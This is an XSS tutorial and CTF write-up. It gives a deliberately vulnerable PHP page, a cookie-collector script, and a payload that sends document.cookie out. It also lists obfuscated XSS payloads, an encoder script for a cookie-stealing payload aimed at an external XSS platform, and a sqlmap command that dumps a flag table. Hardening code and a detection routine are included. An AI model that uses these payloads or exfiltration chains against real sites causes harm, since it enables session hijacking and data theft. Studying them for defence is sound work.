XSS (Cross-Site Scripting): Attack Analysis and Defense

Cookie spoofing attack

index.php

<?php
// Demo cookie; it is set without HttpOnly, so JavaScript can read it via document.cookie
setcookie("name", "cookie");
if (isset($_POST['name']))
{
    // Vulnerable on purpose: the submitted value is echoed without any output encoding
    echo $_POST['name'];
}
?>
<html>
<body>
<form action="" method="post">
Name: <input type="text" name="name"><br>
<input type="submit">
</form>
</body>
</html>

getcookie.php

<?php
// Collector script: appends whatever arrives in the "cookie" query parameter to demo.txt
$cookie1 = $_GET['cookie'];
$log = fopen("demo.txt", "a");
fwrite($log, $cookie1 . "\n");
fclose($log);
?>

Payload, entered into the input box:

<script>var img = document.createElement('img');img.src = 'http://localhost/getcookie.php?cookie='+encodeURIComponent(document.cookie);</script>

The cookie is successfully captured in demo.txt.
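The demo works for two independent reasons: the submitted name is echoed without encoding, and the cookie is readable from JavaScript. The following is an added example, not code from the original post, showing a hardened version of index.php that closes both gaps and adds a Content-Security-Policy as a backstop. The helper name render_name() is my own; the array form of setcookie() assumes PHP 7.3 or later.

```php
<?php
// Hardened index.php (added example, not the original page's code).
// Three independent layers: cookie flags, output encoding, and a CSP backstop.

// 1. Cookie flags. HttpOnly keeps the value out of document.cookie, so the
//    collector script above would receive an empty string even if the page
//    were still injectable. SameSite=Strict keeps it off cross-site requests.
setcookie("name", "cookie", [
    'httponly' => true,
    'samesite' => 'Strict',
    'secure'   => !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off',
    'path'     => '/',
]);

// 2. CSP. script-src without 'unsafe-inline' refuses both inline <script>
//    blocks and inline event handlers (onerror=, onclick=, ...), which covers
//    every payload listed on this page should encoding ever be missed.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'");
header("X-Content-Type-Options: nosniff");

// 3. Output encoding. < > & " ' become entities, so the input is displayed
//    as text and never parsed as markup. render_name() is this example's helper.
function render_name(string $raw): string {
    return htmlspecialchars($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$shown = '';
if (isset($_POST['name'])) {
    $shown = render_name($_POST['name']);
}
?>
<!DOCTYPE html>
<html>
<body>
<?php if ($shown !== ''): ?>
<p>Hello, <?= $shown ?></p>
<?php endif; ?>
<form action="" method="post">
Name: <input type="text" name="name"><br>
<input type="submit">
</form>
</body>
</html>
```

Submitting the page's payload to this version shows the literal text of the script tag in the paragraph; nothing executes, and because the cookie is HttpOnly the collector would log an empty line even against the unpatched echo.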

Some payloads

<img src = "#" onerror=alert(/xss/)>

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
Original code:
<img src="1" onerror=eval("alert('xss')")></img>
<a href="" onclick="alert(1)">aaaaa</a>
<a href="" onclick=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>aaaaa</a>
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>
<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>
<iframe src=1 onmouseover=alert('xss') y=2016 /><iframe>

CISCN 2019 East China North Regional, Web2

Method: submit a post -> feedback -> obtain the admin cookie -> SQL injection

HTML markup encoding

in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();"

output = ""

# Encode every character as a decimal character reference (&#NN, no trailing ';')
for c in in_str:
    output += "&#" + str(ord(c))

# The browser decodes the references inside the script body before eval runs
print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")
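Both the payload list above and this encoder script rely on the same thing: the browser decodes numeric character references (with or without the trailing semicolon) and JavaScript \xNN escapes before the code runs, so a filter that searches the raw input for alert( or eval( sees nothing. The following is an added example, not from the original post, of how a log-review or input-triage routine has to normalise those obfuscations before matching. The function names are my own, the sample inputs are constructed from the payloads on this page, and this is a triage aid for files like demo.txt or submitted posts, not a replacement for output encoding.

```php
<?php
// Added example (not from the original post): undo the obfuscations used by the
// payloads above, then look for script markers. Function names are this example's own.

// Decode &#NN; and &#xNN; references. Browsers accept them without the ';'
// inside attribute values and the encoder above relies on that, so ';' is optional.
function decode_char_refs(string $s): string {
    $s = preg_replace_callback('/&#x([0-9a-fA-F]+);?/', function ($m) {
        return mb_chr((int)hexdec($m[1]), 'UTF-8') ?: '';
    }, $s);
    $s = preg_replace_callback('/&#([0-9]+);?/', function ($m) {
        return mb_chr((int)$m[1], 'UTF-8') ?: '';
    }, $s);
    // Named entities used in the data: URL payload (&lt; &gt; &quot; &amp;)
    return html_entity_decode($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Decode JavaScript \xNN and \uNNNN string escapes (the eval("\x61\x6c...") trick).
function decode_js_escapes(string $s): string {
    $s = preg_replace_callback('/\\\\x([0-9a-fA-F]{2})/', function ($m) {
        return chr((int)hexdec($m[1]));
    }, $s);
    return preg_replace_callback('/\\\\u([0-9a-fA-F]{4})/', function ($m) {
        return mb_chr((int)hexdec($m[1]), 'UTF-8') ?: '';
    }, $s);
}

// Repeat until stable: the data: URL payload nests entities inside an attribute,
// and double-encoded input (&amp;#97;) only resolves on the second pass.
function normalize_payload(string $raw): string {
    $prev = null;
    $cur  = $raw;
    for ($i = 0; $i < 5 && $cur !== $prev; $i++) {
        $prev = $cur;
        $cur  = decode_js_escapes(decode_char_refs($cur));
    }
    return strtolower($cur);
}

// Markers that only become visible once the obfuscation has been undone.
function looks_like_xss(string $raw): bool {
    $n = normalize_payload($raw);
    return (bool)preg_match('/<script|javascript:|\son[a-z]+\s*=|eval\s*\(|document\.cookie/', $n);
}

// Constructed sample input: payloads from this page plus two benign strings.
$samples = [
    '<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">',
    '<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>',
    '<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>',
    '<svg><script>eval&#40&#34&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#34&#41</script>',
    'Tom &amp; Jerry',
    'price < 100 and rate > 5%',
];
foreach ($samples as $s) {
    printf("%-5s %s\n", looks_like_xss($s) ? 'FLAG' : 'ok', substr($s, 0, 60));
}
```

The first four samples are flagged only after normalisation turns `&#97;&#108;...` into `alert(` and `\x61\x6c...` into the same; the two benign strings pass. Pattern matching of this kind is useful for spotting what landed in a log, but it is always one encoding behind the attacker, which is why the fix in the application is encoding on output rather than filtering on input.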

After submitting it on the platform, brute-force the MD5:

import hashlib

# Find the integer whose MD5 hex digest starts with the 6-character prefix the platform gave us
for i in range(1, 10000001):
    s = hashlib.md5(str(i).encode('utf-8')).hexdigest()[0:6]
    if s == "4426f0":
        print(i)
        break

Set the admin cookie, guess the backend path, and find that /admin.php is accessible.
Inject to obtain the flag:

python sqlmap.py -u http://502ce080-5cd5-4c3d-8467-1fc354132f71.node3.buuoj.cn/admin.php?id=2 --cookie="PHPSESSID=57bd5e76b87b83da7e7332ad6f60cdd7" -T flag --dump --flush-session --fresh-queries --fresh-queries --delay 0.1